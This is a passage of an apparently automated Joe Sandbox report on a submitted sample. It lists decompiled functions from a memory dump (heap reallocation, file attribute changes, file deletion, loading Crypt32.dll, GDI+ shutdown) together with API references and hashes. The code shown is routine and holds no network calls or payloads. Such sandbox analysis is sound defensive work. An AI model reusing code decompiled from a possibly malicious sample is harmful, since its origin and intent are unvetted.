				_t41[0x39] = _t41[0x39] & 0;
				_t23 = E00BBE0A0(_t36, _t41, _t46, 0xe6e0);
				 *((intOrPtr*)(_t43 - 0x14)) = _t23;
				 *(_t43 - 4) = 1;
				_t47 = _t23;
				if(_t23 == 0) {
					_t24 = 0;
					__eflags = 0;
				} else {
					_push(_t28);
					_t24 = E00BB17D6(_t23, _t47);
				}
				_t41[0x38] = _t24;
				_push( *((intOrPtr*)(_t38 + 0x82d8)));
				 *(_t43 - 4) = 0;
				E00BB437B(_t24, _t36);
				 *[fs:0x0] =  *((intOrPtr*)(_t43 - 0xc));
				return _t41;
			}

0x00ba7c41
0x00ba7c41
0x00ba7c41
0x00ba7c46
0x00ba7c4b
0x00ba7c4c
0x00ba7c4f
0x00ba7c51
0x00ba7c55
0x00ba7c58
0x00ba7c5b
0x00ba7c61
0x00ba7c66
0x00ba7c6b
0x00ba7c6f
0x00ba7c72
0x00ba7c79
0x00ba7c80
0x00ba7c8b
0x00ba7c91
0x00ba7c94
0x00ba7c98
0x00ba7c9a
0x00ba7ca6
0x00ba7ca6
0x00ba7c9c
0x00ba7c9c
0x00ba7c9f
0x00ba7c9f
0x00ba7ca8
0x00ba7cb0
0x00ba7cb6
0x00ba7cba
0x00ba7cc7
0x00ba7cd1

APIs

__EH_prolog.LIBCMT ref: 00BA7C46

Part of subcall function 00BAC767: __EH_prolog.LIBCMT ref: 00BAC76C
Part of subcall function 00BAC767: new.LIBCMT ref: 00BAC7AF
Part of subcall function 00BAC767: new.LIBCMT ref: 00BAC7D3

new.LIBCMT ref: 00BA7C8B

Part of subcall function 00BB17D6: __EH_prolog.LIBCMT ref: 00BB17DB

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 9c41437f194c1b10934fca8336bf5edc9b88fc5fc50e4321deedc6121fa1a607
Instruction ID: a30e35a8286eaca01afda12089e88b97a6829f0ba8a385b155cff25f133d9bea
Opcode Fuzzy Hash: 9c41437f194c1b10934fca8336bf5edc9b88fc5fc50e4321deedc6121fa1a607
Instruction Fuzzy Hash: 1011A971A187449BDB24DFB8C801BEAFBF4EF44361F0088AEE45AD3240EBB499008761

Uniqueness

Uniqueness Score: -1.00%

Function 00BC8486 Relevance: 3.0, APIs: 2, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E00BC8486(void* __ecx, void* __edx, void* _a4, long _a8) {
				void* __esi;
				void* _t4;
				long _t7;
				void* _t9;
				void* _t13;
				void* _t14;
				long _t16;

				_t13 = __edx;
				_t10 = __ecx;
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 = _a8;
					__eflags = _t16;
					if(_t16 != 0) {
						__eflags = _t16 - 0xffffffe0;
						if(_t16 <= 0xffffffe0) {
							while(1) {
								_t4 = HeapReAlloc( *0xc006e4, 0, _t14, _t16);
								__eflags = _t4;
								if(_t4 != 0) {
									break;
								}
								__eflags = E00BC8214();
								if(__eflags == 0) {
									goto L5;
								}
								_t7 = E00BC6FF2(_t10, _t13, _t16, __eflags, _t16);
								_pop(_t10);
								__eflags = _t7;
								if(_t7 == 0) {
									goto L5;
								}
							}
							L7:
							return _t4;
						}
						L5:
						 *((intOrPtr*)(E00BC87DA())) = 0xc;
						L6:
						_t4 = 0;
						__eflags = 0;
						goto L7;
					}
					E00BC835E(_t14);
					goto L6;
				}
				_t9 = E00BC8398(__ecx, _a8); // executed
				return _t9;
			}

0x00bc8486
0x00bc8486
0x00bc848c
0x00bc8491
0x00bc849f
0x00bc84a2
0x00bc84a4
0x00bc84af
0x00bc84b2
0x00bc84d9
0x00bc84e3
0x00bc84e9
0x00bc84eb
0x00000000
0x00000000
0x00bc84ca
0x00bc84cc
0x00000000
0x00000000
0x00bc84cf
0x00bc84d4
0x00bc84d5
0x00bc84d7
0x00000000
0x00000000
0x00bc84d7
0x00bc84c1
0x00000000
0x00bc84c1
0x00bc84b4
0x00bc84b9
0x00bc84bf
0x00bc84bf
0x00bc84bf
0x00000000
0x00bc84bf
0x00bc84a7
0x00000000
0x00bc84ac
0x00bc8496
0x00000000

APIs

_free.LIBCMT ref: 00BC84A7

Part of subcall function 00BC8398: RtlAllocateHeap.NTDLL(00000000,?,?,?,00BC3866,?,0000015D,?,?,?,?,00BC4D42,000000FF,00000000,?,?), ref: 00BC83CA

HeapReAlloc.KERNEL32(00000000,?,?,?,?,00BDFF50,00BACD97,?,?,?,?,?,?), ref: 00BC84E3

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: ae49b2b308f70c16700cd4be3bfb028a0ccc40f625ef709e4599f4ed59c3860c
Instruction ID: cf5d2b50610ca1b2636aab14c5248a87460e6e209918ebd6516a89a401f4036c
Opcode Fuzzy Hash: ae49b2b308f70c16700cd4be3bfb028a0ccc40f625ef709e4599f4ed59c3860c
Instruction Fuzzy Hash: CAF096322056166ADB292B259C45F6F37DDDFC1B70B2581AEFD189A2A1DF34DC0091A1

Uniqueness

Uniqueness Score: -1.00%

Function 00BB0866 Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BB0866(void* __ecx) {
				long _v8;
				long _v12;
				int _t8;
				void* _t14;
				signed int _t15;
				signed int _t17;

				_t8 = GetProcessAffinityMask(GetCurrentProcess(),  &_v8,  &_v12); // executed
				if(_t8 == 0) {
					return _t8 + 1;
				}
				_t14 = 0;
				_t17 = _v8;
				_t15 = 1;
				do {
					if((_t17 & _t15) != 0) {
						_t14 = _t14 + 1;
					}
					_t15 = _t15 + _t15;
				} while (_t15 != 0);
				if(_t14 >= 1) {
					return _t14;
				}
				return 1;
			}

0x00bb087a
0x00bb0882
0x00000000
0x00bb0884
0x00bb0889
0x00bb088d
0x00bb0890
0x00bb0892
0x00bb0894
0x00bb0896
0x00bb0896
0x00bb0897
0x00bb0897
0x00bb089e
0x00000000
0x00bb08a0
0x00bb08a5

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 00BB0873
GetProcessAffinityMask.KERNEL32 ref: 00BB087A

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: f2d57f51c593e23fa61bfe95b86c78c651502d3b7a7730413e8d2093c7f93781
Instruction ID: 75e268f44cf4a20cdd62618a05a9b9326a3933674b7facedfb15259442f57c12
Opcode Fuzzy Hash: f2d57f51c593e23fa61bfe95b86c78c651502d3b7a7730413e8d2093c7f93781
Instruction Fuzzy Hash: DCE09B72E21105A74F18A7A99C148FB73DDDA54201714C1FAE842D7500FA74DE0186F0

Uniqueness

Uniqueness Score: -1.00%

Function 00BAA384 Relevance: 3.0, APIs: 2, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00BAA384(WCHAR* _a4, long _a8) {
				short _v4100;
				int _t12;
				signed int _t18;
				signed int _t19;

				E00BBE1C0();
				_push(_t18);
				_t12 = SetFileAttributesW(_a4, _a8); // executed
				_t19 = _t18 & 0xffffff00 | _t12 != 0x00000000;
				if(_t19 == 0 && E00BAB5AC(_a4,  &_v4100, 0x800) != 0) {
					_t19 = _t19 & 0xffffff00 | SetFileAttributesW( &_v4100, _a8) != 0x00000000;
				}
				return _t19;
			}

0x00baa38c
0x00baa391
0x00baa398
0x00baa3a0
0x00baa3a5
0x00baa3d1
0x00baa3d1
0x00baa3da

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00BAA1BA,?,?,?,00BAA053,?,00000001,00000000,?,?), ref: 00BAA398
SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00BAA1BA,?,?,?,00BAA053,?,00000001,00000000,?,?), ref: 00BAA3C9

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 9792e23fc3be6725c2a0e407c40ed17a78dc34dfa96e92cab11c52f6d11813be
Instruction ID: 64c548a3bd4837237db1e765b47056964924966cb222a16c25dbfbc204e8cd45
Opcode Fuzzy Hash: 9792e23fc3be6725c2a0e407c40ed17a78dc34dfa96e92cab11c52f6d11813be
Instruction Fuzzy Hash: 53F0A031141149BBDF015F60DC00FE97BACEB05381F448092BC8896160DB72C999EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD3C9 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00BBD3F7
SetDlgItemTextW.USER32(00000065,?), ref: 00BBD40E

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: ItemText_swprintf
String ID:
API String ID: 3011073432-0
Opcode ID: 45d90d5e4f7a9a7389c2390f3849089494251ccabd3efca0cbb79f3f5cd4e88d
Instruction ID: 529ba441c75a6fc86bc2fd4f68291319d6494ac350e7cda0b960f7747d492937
Opcode Fuzzy Hash: 45d90d5e4f7a9a7389c2390f3849089494251ccabd3efca0cbb79f3f5cd4e88d
Instruction Fuzzy Hash: B5F0EC319483483BEB11ABA09C46FED3BECDB05742F1400D5B601571E2E9F55B108773

Uniqueness

Uniqueness Score: -1.00%

Function 00BAA06D Relevance: 3.0, APIs: 2, Instructions: 28
fileCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00BAA06D(WCHAR* _a4) {
				short _v4100;
				int _t10;
				signed int _t16;
				signed int _t17;

				E00BBE1C0();
				_push(_t16);
				_t10 = DeleteFileW(_a4); // executed
				_t17 = _t16 & 0xffffff00 | _t10 != 0x00000000;
				if(_t17 == 0 && E00BAB5AC(_a4,  &_v4100, 0x800) != 0) {
					_t17 = _t17 & 0xffffff00 | DeleteFileW( &_v4100) != 0x00000000;
				}
				return _t17;
			}

0x00baa075
0x00baa07a
0x00baa07e
0x00baa086
0x00baa08b
0x00baa0b4
0x00baa0b4
0x00baa0bd

APIs

DeleteFileW.KERNELBASE(?,?,?,00BA97EC,?,?,00BA961D), ref: 00BAA07E
DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00BA97EC,?,?,00BA961D), ref: 00BAA0AC

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 96637380172f513d983f472500376e6e58f8279d75a39ddb0e18d28e78210aa6
Instruction ID: f06f1f8c2071641f2d756fd96f825b8ed219901949c1d01eca6a611b78c48a13
Opcode Fuzzy Hash: 96637380172f513d983f472500376e6e58f8279d75a39ddb0e18d28e78210aa6
Instruction Fuzzy Hash: A6E022305422086BDB12AF60DC00FE9779CEF19381F4800A6BC88D30A0EF71CC94EA61

Uniqueness

Uniqueness Score: -1.00%

Function 00BBA31B Relevance: 3.0, APIs: 2, Instructions: 27
comCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00BBA31B(void* __ecx) {
				intOrPtr _v16;
				intOrPtr* _t5;
				void* _t8;
				void* _t13;
				void* _t16;
				intOrPtr _t19;

				 *[fs:0x0] = _t19;
				_t5 =  *0xbe7430; // 0x776fc100
				 *0xbd2260(_t5, _t13, _t16,  *[fs:0x0], E00BD1E4C, 0xffffffff);
				 *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))();
				L00BBE09A(); // executed
				_t8 =  *0xc01170( *((intOrPtr*)(__ecx + 4))); // executed
				 *[fs:0x0] = _v16;
				return _t8;
			}

0x00bba32c
0x00bba333
0x00bba344
0x00bba34a
0x00bba34f
0x00bba354
0x00bba35e
0x00bba369

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,00BD1E4C,000000FF), ref: 00BBA34F
OleUninitialize.OLE32(?,?,?,?,00BD1E4C,000000FF), ref: 00BBA354

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: b38d9797667850386fbcce8e89394c41d4d264585224faed144b065909c276d6
Instruction ID: 27b0486a2a6a51e17f7a3daaf6852e3bfa5ae3b25e268f0387cb50b15dc81145
Opcode Fuzzy Hash: b38d9797667850386fbcce8e89394c41d4d264585224faed144b065909c276d6
Instruction Fuzzy Hash: 96F03036554654EBC711AB5CED05B5AFBB9FB49B20F04436AF41993760CB746801CA90

Uniqueness

Uniqueness Score: -1.00%

Function 00BAA0D4 Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BAA0D4(WCHAR* _a4) {
				short _v4100;
				long _t6;
				long _t11;
				long _t13;

				E00BBE1C0();
				_t6 = GetFileAttributesW(_a4); // executed
				_t13 = _t6;
				if(_t13 == 0xffffffff && E00BAB5AC(_a4,  &_v4100, 0x800) != 0) {
					_t11 = GetFileAttributesW( &_v4100); // executed
					_t13 = _t11;
				}
				return _t13;
			}

0x00baa0dc
0x00baa0e5
0x00baa0eb
0x00baa0f0
0x00baa111
0x00baa117
0x00baa117
0x00baa11f

APIs

GetFileAttributesW.KERNELBASE(?,?,?,00BAA0C9,?,00BA768B,?,?,?,?), ref: 00BAA0E5
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00BAA0C9,?,00BA768B,?,?,?,?), ref: 00BAA111

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 4cdbbdab154ac0c873dd91b04a82db9fe76e3ed1558fdcef0a2c858003303358
Instruction ID: b8289b31ae1171aae9c0350b95f4026e6aaaf88e3b908a2ff6c5c6492aa3272e
Opcode Fuzzy Hash: 4cdbbdab154ac0c873dd91b04a82db9fe76e3ed1558fdcef0a2c858003303358
Instruction Fuzzy Hash: 04E09B3150411867CB10AB68DC05BD5BB9CDB1A3E1F0041E7FD54E3291EB719D44CAF1

Uniqueness

Uniqueness Score: -1.00%

Function 00BAFFE3 Relevance: 3.0, APIs: 2, Instructions: 25
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BAFFE3(intOrPtr _a4) {
				short _v4100;
				struct HINSTANCE__* _t7;

				E00BBE1C0();
				_t7 = GetSystemDirectoryW( &_v4100, 0x800);
				if(_t7 != 0) {
					E00BAB8A5( &_v4100, _a4,  &_v4100, 0x800);
					_t7 = LoadLibraryW( &_v4100); // executed
				}
				return _t7;
			}

0x00baffeb
0x00bafffe
0x00bb0006
0x00bb0014
0x00bb0020
0x00bb0020
0x00bb002a

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00BAFFFE
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00BAEAC6,Crypt32.dll,00000000,00BAEB4A,?,?,00BAEB2C,?,?,?), ref: 00BB0020

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: a77a3dc26f6f9bbb7f76e52a0056e29b7babba30ac36d18216787ce35a746151
Instruction ID: 43e1b29c664fd3e86e61efe073863b7bf587a564128c54259536ed5eec1fc754
Opcode Fuzzy Hash: a77a3dc26f6f9bbb7f76e52a0056e29b7babba30ac36d18216787ce35a746151
Instruction Fuzzy Hash: 60E0127691115C6BEB21AB94DC04FE777ACEF0D381F4400A6B948D3104DAB4D980CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00BB9A7F Relevance: 3.0, APIs: 2, Instructions: 24
windowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00BB9A7F(signed int __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _t10;
				signed int _t15;

				_push(__ecx);
				_t15 = __ecx;
				_t10 =  &_v8;
				_v8 = __ecx;
				_v8 = _v8 & 0x00000000;
				_push(_t10);
				_push(_a4);
				 *__ecx = 0xbd3670;
				if(_a8 == 0) {
					L00BBE082(); // executed
				} else {
					L00BBE088();
				}
				 *((intOrPtr*)(_t15 + 8)) = _t10;
				 *(_t15 + 4) = _v8;
				return _t15;
			}

0x00bb9a82
0x00bb9a84
0x00bb9a86
0x00bb9a89
0x00bb9a8c
0x00bb9a94
0x00bb9a95
0x00bb9a98
0x00bb9a9e
0x00bb9aa7
0x00bb9aa0
0x00bb9aa0
0x00bb9aa0
0x00bb9aac
0x00bb9ab2
0x00bb9abb

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00BB9AA0
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00BB9AA7

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 76f07a3120981e2067f66de9f6274c05c3ee93f6f84602060f4ce3b1a4f4484e
Instruction ID: d317ee9d3546052bbfff1b85a318db04f6bf7cd5137ef3fbf541642feb70103f
Opcode Fuzzy Hash: 76f07a3120981e2067f66de9f6274c05c3ee93f6f84602060f4ce3b1a4f4484e
Instruction Fuzzy Hash: 6BE06D71804208EBDB10EF88C8016E9B7F8EB04310F20809BE89493310E2F1AE04DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BC1FAC Relevance: 3.0, APIs: 2, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00BC1FAC(void* __ecx, void* __eflags) {
				intOrPtr _t1;
				void* _t2;
				void* _t9;

				_t1 = E00BC30D7(__eflags, E00BC1EF0); // executed
				 *0xbdd680 = _t1;
				if(_t1 != 0xffffffff) {
					_t2 = E00BC3185(__eflags, _t1, 0xc0004c);
					_pop(_t9);
					__eflags = _t2;
					if(_t2 != 0) {
						return 1;
					} else {
						E00BC1FDF(_t9);
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x00bc1fb1
0x00bc1fb6
0x00bc1fbf
0x00bc1fca
0x00bc1fd0
0x00bc1fd1
0x00bc1fd3
0x00bc1fde
0x00bc1fd5
0x00bc1fd5
0x00000000
0x00bc1fd5
0x00bc1fc1
0x00bc1fc1
0x00bc1fc3
0x00bc1fc3

APIs

Part of subcall function 00BC30D7: try_get_function.LIBVCRUNTIME ref: 00BC30EC

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BC1FCA
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00BC1FD5

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
String ID:
API String ID: 806969131-0
Opcode ID: e910a2d9b6a85052d684300223717f076989abd491a9653e98effbceb2b38be4
Instruction ID: fc85d08b136fc859ac47dc22510e284c088490246f23312bd6de9292058ac92a
Opcode Fuzzy Hash: e910a2d9b6a85052d684300223717f076989abd491a9653e98effbceb2b38be4
